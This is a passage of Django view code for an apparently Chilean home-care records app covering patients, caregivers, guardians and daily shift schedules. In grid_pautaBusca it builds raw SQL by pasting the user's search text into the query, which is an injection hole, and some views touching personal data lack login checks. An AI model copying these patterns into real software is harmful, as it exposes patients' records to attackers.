Pacientes'\n\tlogo_pdf = \"/static/img/logopdf.png\"\n\tpaciente = Pacientes.objects.all().order_by('nombre')\n\tcuenta = paciente.count()\n\tfalso_x = False # paciente HABILITADO - DESHABILITADO \n\tcontext = {\n\t\t\"pacientes\":paciente,\n\t\t\"variable1\":variable1,\n\t\t\"falso_x\":falso_x,\n\t\t\"logo_pdf\":logo_pdf,\n\t\t\"cuenta\":cuenta,}\n\treturn render(request,'grid_pacientes.html',context)\n\n@login_required(login_url='login_ini')\ndef grid_param(request):\n\tvariable1 = 'Despliegue de Parametros del Sistema'\n\tparam = Param.objects.all().order_by('tipo','descrip')\n\tcontext = {\n\t\t\"param\":param,\n\t\t\"variable1\":variable1,\n\t}\n\treturn render(request,'grid_param.html',context)\n\n#busca cuidador\ndef grid_cuidadorBusca(request):\n\tvariable1 = 'Despliegue de Cuidadores'\n\tnuevo_cui = 0\n\tqueryset = request.GET.get('buscar').strip()\n\t#return HttpResponse(str(queryset))\n\tif queryset == '':\n\t\tcuidador = Cuidadores.objects.all().exclude(rut='0-0').order_by('nombre')\n\telse:\t\n\t\tcuidador = Cuidadores.objects.filter(Q(nombre__icontains=queryset))\n\n\tcuenta = cuidador.count()\n\tcontext = {\n\t\t\"cuidadores\":cuidador,\n\t\t\"nuevo_cui\":nuevo_cui,\n\t\t\"cuenta\":cuenta,\n\t\t\"variable1\":variable1,\n\t}\n\treturn render(request,'grid_cuidadores.html',context)\n\ndef grid_pacienteBusca(request):\n\tvariable1 = 'Despliegue de Pacientes'\n\tqueryset = request.GET.get('buscar').strip()\n\tpaciente = Pacientes.objects.all().order_by('nombre')\n\tpaciente = Pacientes.objects.filter(Q(nombre__icontains=queryset))\n\tfalso_x = False # paciente HABILITADO - DESHABILITADO \n\tcontext = {\n\t\t\"pacientes\":paciente,\n\t\t\"variable1\":variable1,\n\t\t\"falso_x\":falso_x,}\n\treturn render(request,'grid_pacientes.html',context)\n\n\ndef grid_paramBusca(request):\n\tvariable1 = 'Buscando Parametro'\n\tbuscar = request.GET.get('buscar').strip()\n\tcheck1 = request.GET.get('check1')\n\t#return HttpResponse(\"Viene con: \"+str(queryset))\n\tparam = Param.objects.all().order_by('tipo','descrip')\n\tif buscar != \"\":\n\t\tif check1 == None:\n\t\t\tparam = Param.objects.filter(Q(tipo__icontains=buscar))\n\t\telse:\n\t\t\tparam = Param.objects.filter(Q(descrip__icontains=buscar))\n\tcontext = {\n\t\t\"param\":param,\n\t\t\"variable1\":variable1,\n\t\t\"buscar\":buscar,\n\t}\n\treturn render(request,'grid_param.html',context)\n\ndef ficha_cuidadores(request,id):\n\tvariable1 = 'Ficha del Cuidador'\n\tvariable2 = 'modifica_rut'\n\tobj = Cuidadores.objects.get(id=id)\n\trequest.session['id_x'] = id \t\t# define variable gobal\n\tcontext = {\n\t \t\"rut\":obj.rut,\n\t \t\"nombre\":obj.nombre,\n\t\t\"direccion\":obj.direccion,\n\t\t\"fe_ini\":obj.fe_ini,\n\t\t\"fono_cuid\":obj.fono_cuid,\n\t \t\"fono2_cuid\":obj.fono2_cuid,\n\t \t\"fe_nac\":obj.fe_nac,\n\t \t\"variable1\":variable1,\n\t \t\"variable2\":variable2,}\n\treturn render(request,'ficha_cuidadores.html',context)\n\ndef ficha_apoderados(request,id):\n\tvariable1 = 'Ficha de Apoderado'\n\tvariable2 = 'modifica_rut'\n\tobj = Apoderados.objects.get(id=id)\n\tcontext = {\n\t \t\"rut\":obj.rut,\n\t \t\"nombre\":obj.nombre,\n\t\t\"direccion\":obj.direccion,\n\t\t\"fe_ini\":obj.fe_ini,\n\t\t\"fono_apod\":obj.fono_apod,\n\t \t\"fono2_apod\":obj.fono2_apod,\n\t \t\"variable1\":variable1,\n\t \t\"variable2\":variable2,}\n\treturn render(request,'ficha_apoderados.html',context)\n\n\n@login_required(login_url='login_ini')\ndef EliminaCui(request,id):\n\tvariable1 = 'Eliminación de Cuidador desde la base de datos'\n\tsw1 = 'cui'\n\tform = Cuidadores.objects.get(id=id)\n\tdescrip = form.nombre\n\tcontext = {\n\t\t'form':form,\n\t\t'variable1':variable1,\n\t\t'descrip':descrip,\n\t\t'sw1':sw1,}\n\tif request.method == \"POST\":\t\n\t\t#form.delete()\n\t\treturn redirect('grid_cuidadores')\t#redirige a la URL\n\treturn render(request,'confirma_elimina.html',context)\n\n\n@login_required(login_url='login_ini')\ndef EliminaPac(request,id):\n\tvariable1 = 'Eliminación de Paciente desde la base de datos'\n\tsw1 = 'pac'\n\tform = Pacientes.objects.get(id=id)\n\tdescrip = form.nombre\n\t#usua_x = getpass.getuser() \n\t#permi_x =user.has_perms(['ai.menu_cuidadores']) \n\tcontext = {\n\t\t'form':form,\n\t\t'variable1':variable1,\n\t\t'descrip':descrip,\n\t\t'sw1':sw1,}\n\tif request.method == \"POST\":\n\t\tform.delete()\n\t\treturn redirect('grid_pacientes')\t#redirige a la URL\n\treturn render(request,'confirma_elimina.html',context)\n\n\n@login_required(login_url='login_ini')\ndef EliminaApod(request,id):\n\tvariable1 = 'Eliminacion de Apoderado o Institución'\n\tsw1 = 'apo'\n\tform = Apoderados.objects.get(id=id)\n\tdescrip = form.nombre\n\tcontext = {\n\t\t'form':form,\n\t\t'variable1':variable1,\n\t\t'descrip':descrip,\n\t\t'sw1':sw1,}\n\tif request.method == \"POST\": \t\n\t\tform.delete()\n\t\treturn redirect('grid_apoderados')\t#redirige a la URL\n\treturn render(request,'confirma_elimina.html',context)\n\n\ndef NuevoCui(request):\n\tvariable1 = 'Agregando nueva Ficha de Cuidador'\n\tvariable2 = \"modifica_rut\"\n\terror_new = \"ok\"\n\tnuevo_cui = 1\t# nuevo\n\tform = CuidadoresForm(request.POST or None)\n\tregion = Param.objects.filter(tipo='REGI').order_by('descrip')\n\tcomuna = Param.objects.filter(tipo='COMU').order_by('descrip')\n\tsexo = Param.objects.filter(tipo='SEXO').order_by('codigo')\n\ttipo = Param.objects.filter(tipo='CONTR').order_by('codigo') # Contratado - honorarios\n\tclasi = Param.objects.filter(tipo='CLASI').order_by('codigo') #\n\tinstr\t= Param.objects.filter(tipo='INSTR').order_by('codigo')\n\tecivil\t= Param.objects.filter(tipo='ECIVI')\n\tcontext = {\n\t\t'form':form,\n\t\t'variable1':variable1,\n\t\t'variable2':variable2,\n\t\t'region':region,\n\t\t'comuna':comuna,\n\t\t'sexo':sexo,\n\t\t'tipo':tipo,\n\t\t'clasi':clasi,\n\t\t'instr':instr,\n\t\t'ecivil':ecivil,\n\t\t'nuevo_cui':nuevo_cui,\n\t\t'error_new':error_new,\n\t\t}\n\tif request.method == \"POST\":\n\t\tcuidador = Cuidadores\n\t\trut_x = request.POST.get('rut') # valor del template\n\t\texiste = cuidador.objects.filter(rut=rut_x).exists()\n\t\tdirecc_x = request.POST.get('direccion') # valor del template\n\t\tif existe == True:\n\t\t\terror_new = 'error1'\n\t\t\tcontext = {\n\t\t\t\t'form':form,\n\t\t\t\t'variable1':variable1,\n\t\t\t\t'variable2':variable2,\n\t\t\t\t'region':region,\n\t\t\t\t'comuna':comuna,\n\t\t\t\t'sexo':sexo,\n\t\t\t\t'tipo':tipo,\n\t\t\t\t'clasi':clasi,\n\t\t\t\t'instr':instr,\n\t\t\t\t'error_new':error_new,\n\t\t\t}\n\t\telse:\n\t\t\tif form.is_valid():\n\t\t\t\tcuidador = Cuidadores\n\t\t\t\tform.save()\n\t\t\t\treturn redirect('grid_cuidadores')\n\treturn render(request,'ficha_cuidadores.html',context)\n\n\ndef NuevoApod(request):\n\tvariable1 = 'Agregando nueva Ficha de Apoderado'\n\tvariable2 = \"modifica_rut\"\n\terror_new = \"ok\"\n\tform = ApoderadosForm(request.POST or None)\n\tregion = Param.objects.filter(tipo='REGI').order_by('descrip')\n\tcomuna = Param.objects.filter(tipo='COMU').order_by('descrip')\n\tcontext = {\n\t\t'form':form,\n\t\t'variable1':variable1,\n\t\t'variable2':variable2,\n\t\t'region':region,\n\t\t'comuna':comuna,\n\t\t'error_new':error_new,\n\t\t}\n\tif request.method == \"POST\":\n\t\tapoderado = Apoderados\n\t\trut_x = request.POST.get('rut') # valor del template\n\t\texiste = apoderado.objects.filter(rut=rut_x).exists()\n\t\tif existe == True:\n\t\t\terror_new = 'error1'\n\t\t\tcontext = {\n\t\t\t\t'form':form,\n\t\t\t\t'variable1':variable1,\n\t\t\t\t'variable2':variable2,\n\t\t\t\t'region':region,\n\t\t\t\t'comuna':comuna,\n\t\t\t\t'error_new':error_new,\n\t\t\t}\n\t\telse:\n\t\t\tif form.is_valid():\n\t\t\t\tapoderado = Apoderados\n\t\t\t\tform.save()\n\t\t\t\treturn redirect('grid_apoderados')\n\treturn render(request,'ficha_apoderados.html',context)\n\n\ndef NuevoPac(request):\n\t# Manda al formulario todos los campos vacios\n\tvariable1 = 'Agregando nueva Ficha de Paciente'\n\tvariable2 = \"modifica_rut\"\n\terror_new = \"ok\"\n\tfechahoy = datetime.now()\t\t\n\tmes_numerico = fechahoy.month \n\tano_hoy = fechahoy.year\t\t\n\tnuevo_pac = 1\n\tform \t = PacientesForm(request.POST or None)\n\tregion = Param.objects.filter(tipo='REGI').order_by('descrip')\n\tcomuna = Param.objects.filter(tipo='COMU').order_by('descrip')\n\tsexo = Param.objects.filter(tipo='SEXO').order_by('codigo')\n\tcob = Param.objects.filter(tipo='COBR').order_by('codigo') # tipo de cobranza\n\tclasi = Param.objects.filter(tipo='PROC').order_by('codigo') # particular - instit.\n\tabon = Param.objects.filter(tipo='ABON').order_by('codigo') # Efec,Cheq,Tarj\n\tyace = Param.objects.filter(tipo='YACE').order_by('-codigo') #Hosp.Domici.Cli\n\tecivil\t = Param.objects.filter(tipo='ECIVI')\n\tprevi\t = Param.objects.filter(tipo='PREVI')\n\n\tcontext = {\n\t\t'form':form,\n\t\t'variable1':variable1,\n\t\t'variable2':variable2,\n\t\t'region':region,\n\t\t'comuna':comuna,\n\t\t'sexo':sexo,\n\t\t'cob':cob,\n\t\t'clasi':clasi,\n\t\t'abon':abon,\n\t\t'error_new':error_new,\n\t\t'yace':yace,\n\t\t'nuevo_pac':nuevo_pac,\n\t\t'car_doc_cobro':\"3\",\n\t\t'previ':previ,\n\t\t'ecivil':ecivil,\n\t\t}\n\n\t#return HttpResponse(str(ecivil))\n\n\tif request.method == \"POST\":\n\t\tpaciente = Pacientes # modelo\n\t\trut_x = request.POST.get('rut') # valor del template\n\t\tnombre_x = request.POST.get('nombre') # valor del template\n\t\t#fe_ini = request.POST.get('fe_ini') # valor del template\n\t\tfechahoy = datetime.now() \n\t\tano_hoy = fechahoy.year\n\t\tmes_hoy = fechahoy.month\n\t\texiste = paciente.objects.filter(rut=rut_x).exists()\n\t\tif existe == True:\n\t\t\terror_new = 'error1'\n\t\t\tcontext = {\n\t\t\t\t'form':form,\n\t\t\t\t'variable1':variable1,\n\t\t\t\t'variable2':variable2,\n\t\t\t\t'region':region,\n\t\t\t\t'comuna':comuna,\n\t\t\t\t'sexo':sexo,\n\t\t\t\t'cob':cob,\n\t\t\t\t'clasi':clasi,\n\t\t\t\t'abon':abon,\n\t\t\t\t'error_new':error_new,\n\t\t\t\t'yace':yace,\n\t\t\t\t'rut_x':rut_x,\n\t\t\t\t'ecivil':ecivil,}\t\n\t\telse:\n\t\t\tif form.is_valid():\n\t\t\t\t#saldo_ant = saldoant(rut_x,mes_numerico,ano_hoy) # misfunciones.py 11-04-2020\n\t\t\t\t#return HttpResponse(saldo_ant)\n\t\t\t\t#if saldo_ant > 0:\t# 11-04-2020\n\t\t\t\t#\terror3 = '1'\t# 11-04-2020\n\t\t\t\tpaciente = Pacientes # modelo\n\t\t\t\tform.save()\n\t\t\t\t# Crea un registro en tabla SALDOS (misfunciones.py)\n\t\t\t\tgrabasaldo(nombre_x,rut_x,0,mes_hoy,ano_hoy) \n\t\t\t\treturn redirect('grid_pacientes')\n\treturn render(request,'ficha_pacientes.html',context)\n\n\n@login_required(login_url='login_ini')\ndef ActualizaCui(request,id):\n\tvariable1 = 'Modifica Cuidador existente'\n\tnuevo_cui = 0\n\tvariable2 = 'nomodifica_rut'\n\tcuidador = Cuidadores.objects.get(id=id)\n\trequest.session['id_x'] = id \t# define variable gobal\n\tform = CuidadoresForm(request.POST or None, request.FILES or None,instance=cuidador)\n\t#form = CuidadoresForm(request.POST, request.FILES or None)\n\tregion = Param.objects.filter(tipo='REGI').order_by('descrip')\n\tcomuna = Param.objects.filter(tipo='COMU').order_by('descrip')\n\tsexo = Param.objects.filter(tipo='SEXO').order_by('codigo')\n\ttipo = Param.objects.filter(tipo='CONTR').order_by('codigo') #tipo contrato\n\tclasi =\t Param.objects.filter(tipo='CLASI').order_by('codigo') #Superior-interm.-stand\n\tinstr\t = Param.objects.filter(tipo='INSTR').order_by('codigo') # nivel educ.\n\tecivil\t = Param.objects.filter(tipo='ECIVI')\n\tvar_region = cuidador.region # entrega valor del registro Cuidadores\n\tvar_comuna = cuidador.comuna # entrega valor del registro Cuidadores\n\tvar_sex = cuidador.sexo # entrega valor del registro Cuidadores\n\tvar_tip = cuidador.tipo # entrega valor del registro Cuidadores\n\tvar_clasi = cuidador.clasi # entrega valor del registro Cuidadores\n\tvar_instr = cuidador.instr # nivel educacional\n\tvar_ecivil = cuidador.ecivil # estadocivil\n\n\tif request.method == \"POST\":\n\t\telim_foto_x = request.POST.get('elim_foto')\n\t\tif elim_foto_x == '0': # elimina\n\t\t\tremove(\"/static/img/\"+cuidador.rut+\".jpg\")\n\n\t\tif form.is_valid():\n\t\t\tcuidador.media = \"\"\n\t\t\tform.save()\n\t\t\treturn redirect('grid_cuidadores')\n\n\tform = CuidadoresForm(instance=cuidador)\n\tvar_sex = cuidador.sexo # entrega valor del campo\n\tvar_region = cuidador.region # entrega valor del campo\n\tvar_comuna = cuidador.comuna # entrega valor del campo\n\tvar_ecivil = cuidador.ecivil\n\tfotito = \"/static/img/\"+cuidador.rut+\".jpg\"\n\tcontext = {\n\t\t\"variable1\":variable1,\n\t\t\"variable2\":variable2,\n\t\t\"form\":form,\n\t\t\"sexo\":sexo,\n\t\t\"region\":region,\n\t\t\"comuna\":comuna,\n\t\t\"clasi\":clasi,\n\t\t\"tipo\":tipo,\n\t\t\"instr\":instr,\n\t\t\"ecivil\":ecivil,\n\t\t\"fotito\":fotito,\n\t\t\"id_x\":id,\n\t\t\"var_sex\":var_sex,\n\t\t\"var_region\":var_region,\n\t\t\"var_comuna\":var_comuna,\n\t\t\"var_tip\":var_tip,\n\t\t\"var_clasi\":var_clasi,\n\t\t\"var_instr\":var_instr,\n\t\t\"var_ecivil\":var_ecivil,\n\t\t\"nuevo_cui\":nuevo_cui,\n\t\t}\n\treturn render(request,'ficha_cuidadores.html',context)\n\n\n@login_required(login_url='login_ini')\ndef ActualizaApod(request,id):\n\tvariable1 = 'Modifica Apoderado existente'\n\tvariable2 = 'nomodifica_rut'\n\tapoderado = Apoderados.objects.get(id=id)\n\tregion = Param.objects.filter(tipo='REGI').order_by('descrip')\n\tcomuna = Param.objects.filter(tipo='COMU').order_by('descrip')\n\tif request.method == \"POST\":\n\t\tform = ApoderadosForm(request.POST,instance=apoderado)\n\n\t\tregion = Param()\n\t\tregion.codigo = request.POST.get('regi')\n\n\t\tcomuna = Param()\n\t\tcomuna.codigo = request.POST.get('comu')\n\n\t\tif form.is_valid():\n\t\t\tform.save()\n\t\t\treturn redirect('grid_apoderados')\n\t\telse:\n\t\t\tform = ApoderadosForm(instance = apoderado)\n\t\t\tvar_region = apoderado.region # entrega valor del campo\n\t\t\tvar_comuna = apoderado.comuna # entrega valor del campo\n\t\t\tcontext = {\n\t\t\t\t\"variable1\":variable1,\n\t\t\t\t\"variable2\":variable2,\n\t\t\t\t\"form\":form,\n\t\t\t\t\"region\":region,\n\t\t\t\t\"comuna\":comuna,\n\t\t\t\t\"id_x\":id,\n\t\t\t\t\"var_region\":var_region,\n\t\t\t\t\"var_comuna\":var_comuna,\n\t\t\t}\n\t\t\trender(request,'ficha_apoderados.html',context)\n\telse:\n\t\tform = ApoderadosForm(instance=apoderado) # trae el registro completo\n\t\tvar_region = apoderado.region # entrega valor del campo\n\t\tvar_comuna = apoderado.comuna # entrega valor del campo\n\t\tcontext = {\n\t\t\t\"variable1\":variable1,\n\t\t\t\"variable2\":variable2,\n\t\t\t\"form\":form,\n\t\t\t\"region\":region,\n\t\t\t\"comuna\":comuna,\n\t\t\t\"id_x\":id,\n\t\t\t\"var_region\":var_region,\n\t\t\t\"var_comuna\":var_comuna,\n\t\t\t}\n\treturn render(request,'ficha_apoderados.html',context)\n\n\n@login_required(login_url='login_ini')\ndef ActualizaPac(request,id):\n\tfechahoy = datetime.now() \n\tdia_hoy = fechahoy.day\n\tmes_hoy = fechahoy.month\n\tano_hoy = fechahoy.year\n\tnuevo_pac = 0\n\t#\n\terror1= \"ok\"\t# rut de paciente ya existe\n\tvariable1 = 'Modifica Paciente Existente'\n\tvariable2 = ''\n\tcomuna = Param.objects.filter(tipo='COMU').order_by('descrip')\n\tpaciente = Pacientes.objects.get(id=id) # registro en tabla\n\n\t#Determina el monto abono INICIAL\n\tvalor_abono = 0\n\tif paciente.fe_ini != None:\n\t\tfe_i = str(paciente.fe_ini)[0:10] # entrega '9999-99-99'\tfecha de inicio del paciente\n\t\tfe_f = str(fechahoy)[0:10]\t\t # entrega '9999-99-99' \tfecha actual\n\t\texiste = Anticipos.objects.filter(rut=paciente.rut,sw_abono=\"1\",fecha__range=(fe_i,fe_f)).exists()\n\t\tif existe==True: \n\t\t\tanticipo = Anticipos.objects.get(rut=paciente.rut,sw_abono=\"1\",fecha__range=(fe_i,fe_f))\n\t\t\tvalor_abono = anticipo.valor\n\n\t# Limpia y pone el registro del paciente en esta tabla auxiliar para los ANTICIPOS u otros\n\tusername_y = request.session.get('username_x') # variable gurdada en view plantilla_base\n\n\trequest.session['rut_x'] = paciente.rut # inicializa variable gobal\n\n\tpaciente_aux = Pacientes_aux.objects.all()\n\tPacientes_aux.objects.all().delete() # borra el contenido de la tabla\n\tcursor = connection.cursor() #es necesario: from django.db import connection\n\n\tcursor.execute(\"insert into ai_pacientes_aux (rut,nombre,rut_apod,fe_ini,comuna_apod,mes,ano,username)\"\n\t\t\"values(%s,%s,%s,%s,%s,%s,%s,%s)\"\n\t\t,[paciente.rut,paciente.nombre,paciente.rut_apod,paciente.fe_ini,paciente.comuna_apod,mes_hoy,ano_hoy,str(username_y)])\n\n\tform \t= PacientesForm(request.POST,instance=paciente) # reg. en form\n\t#\n\tregion = Param.objects.filter(tipo='REGI').order_by('descrip')\n\tcomuna = Param.objects.filter(tipo='COMU').order_by('descrip')\n\tsexo = Param.objects.filter(tipo='SEXO').order_by('codigo')\n\tcob = Param.objects.filter(tipo='COBR').order_by('codigo')\n\tclasi = Param.objects.filter(tipo='PROC').order_by('codigo')\n\tabon = Param.objects.filter(tipo='ABON').order_by('codigo')\n\tyace\t= Param.objects.filter(tipo='YACE').order_by('-valor1')\n\tecivil\t= Param.objects.filter(tipo='ECIVI')\n\tprevi\t= Param.objects.filter(tipo='PREVI')\t\n\t#\n\tif request.method == 'POST':\n\t\tif (form.is_valid()):\n\t\t\t#abono_x = request.POST.get('abono_inicial') # valor del template\n\t\t\t#return HttpResponse(str(paciente.fe_alta))\n\t\t\tif paciente.fe_alta != None:\t\t\t \n\t\t\t\tpaciente.estado = '1'\t\n\t\t\t\tpaciente.fe_ini = None\t# fecha vacia\n\n\t\t\tform.save()\n\t\t\treturn redirect('grid_pacientes')\n\t\t\n\t# Despliega el template para modificación\n\tform = PacientesForm(instance=paciente) # trae el registro completo\n\tvar_fe_ini = paciente.fe_ini\n\tvar_region = paciente.region # entrega valor del campo de la tabla\n\tvar_comuna = paciente.comuna # entrega valor del campo de la tabla\n\tvar_comunapod = paciente.comuna_apod # comuna del apoderado o institucion\n\tchek_x = paciente.estado\n\tvar_sex = paciente.sexo # entrega valor del campo de la tabla\n\tvar_cob = paciente.cob\t# tipo de cobranza\n\tvar_clasi = paciente.clasi\n\tvar_abon = paciente.abon #\n\tvar_yace = paciente.yace #Hosp,domicilio,clinica,MaAyuda\n\tvar_doc_cobro = paciente.doc_cobro\n\trut_anticipo = paciente.rut\n\trut_x = paciente.rut\n\tvar_ecivil = paciente.ecivil\n\tvar_previ = paciente.previ\n\n\tsw = 2\n\tcontext = {\n\t\t\t\"variable1\":variable1,\n\t\t\t\"variable2\":variable2,\n\t\t\t\"form\":form,\n\t\t\t\"sexo\":sexo,\n\t\t\t\"region\":region,\n\t\t\t\"comuna\":comuna,\n\t\t\t\"ecivil\":ecivil,\n\t\t\t\"previ\":previ,\n\t\t\t\"yace\":yace,\n\t\t\t\"cob\":cob,\n\t\t\t\"clasi\":clasi,\n\t\t\t\"abon\":abon,\n\t\t\t\"var_sex\":var_sex,\n\t\t\t\"var_region\":var_region,\n\t\t\t\"var_comuna\":var_comuna,\n\t\t\t\"var_comunapod\":var_comunapod,\n\t\t\t\"var_cob\":var_cob,\n\t\t\t\"var_clasi\":var_clasi,\n\t\t\t\"var_abon\":var_abon,\n\t\t\t\"var_yace\":var_yace,\n\t\t\t\"rut_anticipo\":rut_anticipo,\n\t\t\t\"var_doc_cobro\":var_doc_cobro,\n\t\t\t\"mes_hoy\":mes_hoy,\n\t\t\t\"ano_hoy\":ano_hoy,\n\t\t\t\"rut_x\":rut_x,\n\t\t\t\"sw\":sw,\n\t\t\t\"nuevo_pac\":nuevo_pac,\n\t\t\t\"valor_abono\":valor_abono,\n\t\t\t\"var_ecivil\":var_ecivil,\t\t\t\n\t\t\t\"var_previ\":var_previ,\t\t\t\n\t\t\t\"id\":id, }\n\treturn render(request,'ficha_pacientes.html',context)\n\n\ndef MenuParam(request):\n\tvariable1 = 'Mantención de Parametros'\n\tlogo = \"/static/img/Logo_AsistenciaIntegral.jpg\"\n\tcontext ={ \"variable1\":variable1,\"logo_corp\":logo,}\n\treturn render(request,'menuparametros.html',context)\n\n\ndef FichaParam(request,id):\n\tvariable1 = 'Modificando Parametros del Sistema'\n\tparam = Param.objects.get(id=id)\n\t#BOTON ACEPTAR en el template\n\tif request.method == \"POST\":\n\t\tform = ParamForm(request.POST,instance=param)\n\t\tif form.is_valid():\n\t\t\tform.save()\n\t\t\treturn redirect('grid_param')\n\t\telse:\n\t\t\t#falló la actualizacion\n\t\t\tform = ParamForm(instance = param)\n\t\t\tcontext = {\n\t\t\t\t\"variable1\":variable1,\n\t\t\t\t\"form\":form,\n\t\t\t\t\"id_x\":id,\n\t\t\t}\n\t\t\trender(request,'ficha_param.html',context)\n\telse:\n\t\t# x GET - puebla el template.\n\t\tform = ParamForm(instance=param) # trae el formulario completo\n\t\tcontext = {\n\t\t\t\"variable1\":variable1,\n\t\t\t\"form\":form,\n\t\t\t\"id_x\":id,\n\t\t\t}\n\treturn render(request,'ficha_param.html',context)\n\ndef no_esta(rut_x,lista):\n if rut_x in lista:\n return False\n return True\n\n# LLAMADA DESDE PRINCIPAL.HTML \n@login_required(login_url='login_ini')\ndef grid_pauta(request):\n\tvariable1 = 'Pauta Diaria'\n\tlogo_excel = \"/static/img/EXCEL0D.ICO\"\n\tfechahoy = datetime.now() \n\tdia_hoy = fechahoy.day \n\tmes_hoy = fechahoy.month\n\tano_hoy = fechahoy.year\n\t#\n\tfecha = str(ano_hoy)+\"-\"+str(mes_hoy).zfill(2)+\"-\"+str(dia_hoy).zfill(2) + \" 00:00:00\"\n\tsql_pauta = \"select * from ai_pauta where fecha='%s'\" %fecha\n\tpauta = User.objects.raw(sql_pauta)\n\t#\t \n\tdias = []\t# llena este arreglo\n\tk=1\n\tfor i in range(31):\n\t\tdias.append(k)\n\t\tk=k+1\n\n\t# El indice de los arreglos parten con cero\t\t\n\tmeses = ['Enero','Febrero','Marzo','Abril','Mayo','Junio',\n\t'Julio','Agosto','Septiembre','Octubre','Noviembre','Diciembre']\n\tmes_hoy = meses[mes_hoy - 1]\t# mes en palabras\n\tmes_numerico = fechahoy.month # mes en numero\n\n\t# define 3 años para atras + uno adelante\n\tano = [0,0,ano_hoy,0]\n\tano[0] = ano_hoy -2\n\tano[1] = ano_hoy - 1\n\tano[3] = ano_hoy + 1\n\tcuenta = 0\n\tfor ss in pauta:\n\t\tcuenta = cuenta + 1\n\n\tpauta.fecha = fecha\t\n\n\tcontext = {\n\t\t\"pauta\":pauta,\n\t\t\"variable1\":variable1,\n\t\t\"logo_excel\":logo_excel,\n\t\t\"dias\":dias,\n\t\t\"meses\":meses,\n\t\t\"ano\":ano,\n\t\t\"dia_hoy\":dia_hoy,\n\t\t\"mes_hoy\":mes_hoy,\n\t\t\"ano_hoy\":ano_hoy,\n\t\t\"cuenta\":cuenta,\n\t\t\"mes_numerico\":mes_numerico,}\n\treturn render(request,'grid_pauta.html',context)\n\n\n# boton BUSCA/CONSTRUYE \ndef grid_pautaBusca(request):\n\tvariable1 = 'Pauta Diaria'\n\terror1 = \"no_hayerror\"\n\tbuscar = request.GET.get('buscar').strip() # desde el template x method='GET'\n\tdia_x = request.GET.get('dias') # desde el template x method='GET'\n\tmes_x = request.GET.get('meses') # desde el template x method='GET'\n\tano_x = request.GET.get('ano') # desde el template x method='GET'\n\t# \n\t#pauta = Pauta.objects.filter(Q(paciente__icontains=queryset) & Q(estado=False))\n\tfechahoy = datetime.now() \n\tdia_hoy = fechahoy.day\n\tmes_hoy = fechahoy.month\n\tano_hoy = fechahoy.year\n\t#\n\t# llena arreglo con numeral de dias\n\tdias = []\n\tk=1\n\tfor i in range(31):\n\t\tdias.append(k)\n\t\tk=k+1\n\n\t# El indice de los arreglos parten con cero\t\t\n\tmeses = ['Enero','Febrero','Marzo','Abril','Mayo','Junio',\n\t'Julio','Agosto','Septiembre','Octubre','Noviembre','Diciembre']\n\n\t# define 3 años para atras + uno adelante\n\tano = [0,0,ano_hoy,0]\n\tano[0] = ano_hoy -2\n\tano[1] = ano_hoy - 1\n\tano[3] = ano_hoy + 1\n\n\t# Si eligio el ultimo dia del mes verifica q' esté correcto.\n\ttotdias = calendar.monthrange(int(ano_x),meses.index(mes_x) + 1)[1] #total de dias del mes\n\tif int(dia_x) > totdias:\n\t\terror1 = \"hay_error\"\n\t\tmes_hoy = mes_x # en palabras\n\t\tdia_hoy = int(dia_x)\n\t\tano_hoy = int(ano_x)\n\t\tcontext = {\n\t\t\t\"variable1\":variable1,\n\t\t\t\"dias\":dias,\n\t\t\t\"meses\":meses,\n\t\t\t\"ano\":ano,\n\t\t\t\"dia_hoy\":dia_hoy,\n\t\t\t\"mes_hoy\":mes_hoy,\n\t\t\t\"ano_hoy\":ano_hoy,\n\t\t\t\"cuenta\":0,\n\t\t\t\"error1\":error1,}\n\t\treturn render(request,'grid_pauta.html',context)\t\n\t\n\t#preparar para busqueda\n\tdia_z = str(dia_x).zfill(2) \t# transforma a string y llena ceros izq.\n\tmes_z = meses.index(mes_x) + 1 # entrega el numerico del mes\n\tmes_z = str(mes_z).zfill(2)\n\tfecha = str(ano_x)+\"-\"+mes_z+\"-\"+dia_z +\" 00:00:00\"\n\n\t#Todos los que han ingresado hasta esa fecha.\n\tpaciente = Pacientes.objects.filter(fe_ini__range=('1900-01-01', fecha),estado='0') # paciente.estado = '1'\n\n\tif buscar=='': \n\t\tsql_pauta = \"select * from ai_pauta where fecha='%s'\" %fecha\n\t\tpauta = User.objects.raw(sql_pauta)\n\telse:\n\t\tsql_pauta = \"select * from ai_pauta where paciente like '%\"+buscar+\"%' AND fecha = '\"+fecha+\"'\"\n\t\tpauta = User.objects.raw(sql_pauta)\n\tcuenta = 0\t\n\n\tfor ss in pauta:\n\t\tcuenta = cuenta + 1\n\n\t# Agregando RUT's al arreglo\t\t\n\taPauta = []\t\n\tfor j in pauta:\n\t\taPauta.append(j.rut)\n\t\n\tif buscar=='':\n\t\t#inserta registro en ai_pauta\n\t\tcursor = connection.cursor() # es necesario: from django.db import connection\n\t\tfor k in paciente:\n\t\t\tif (not k.rut in aPauta):\n\t\t\t\tcursor.execute(\"insert into ai_pauta (rut,paciente,fecha,tipo_turno1,tipo_turno2,tipo_turno3) \"\n\t\t\t\t\"values(%s,%s,%s,%s,%s ,%s)\",[k.rut,k.nombre,fecha,'0','0','0'])\n\n\t\t#pauta = Pauta.objects.filter(Q(fecha=fecha))\n\n\t\tsql_pauta = \"select * from ai_pauta where fecha='%s'\" %fecha\n\t\tpauta = User.objects.raw(sql_pauta)\n\n\t\tcuenta = 0\t# numero de pactes segun busqueda\n\t\tfor ss in pauta:\n\t\t\tcuenta = cuenta + 1\n\t\t\n\t# numerico, asi lo requiere combo-box en grid_pauta\t\n\tdia_hoy = int(dia_x) \n\tmes_hoy = mes_x\n\n\tcontext = {\n\t\t\"pauta\":pauta,\n\t\t\"variable1\":variable1,\n\t\t\"dias\":dias,\n\t\t\"meses\":meses,\n\t\t\"ano\":ano,\n\t\t\"dia_hoy\":dia_hoy,\n\t\t\"mes_hoy\":mes_hoy,\n\t\t\"ano_hoy\":ano_hoy,\n\t\t\"cuenta\":cuenta,\n\t\t\"error1\":error1,}\n\treturn render(request,'grid_pauta.html',context)\n\n\n# ACTUALIZA FICHA DE PAUTA\n@login_required(login_url='login_ini')\ndef ActualizaPauta(request,id, fecha):\n\terror1= \"ok\"\t# 11-06-2020\n\tvariable1 = 'Definiendo / Actualizando Pauta'\n\ttipo_turno = ['-No asignado','Contratado','Extra']\n\taReca_apod = ['----','Normal','Domingo','Festivo']\n\tpauta = Pauta.objects.get(id=id)\t# registro en tabla\n\tform \t= PautaForm(request.POST,instance=pauta) # reg. en formulario HTML\n\t#\n\tturno1\t= Cuidadores.objects.all().order_by('nombre')\n\tturno2 \t= Cuidadores.objects.all().order_by('nombre')\n\tturno3 \t= 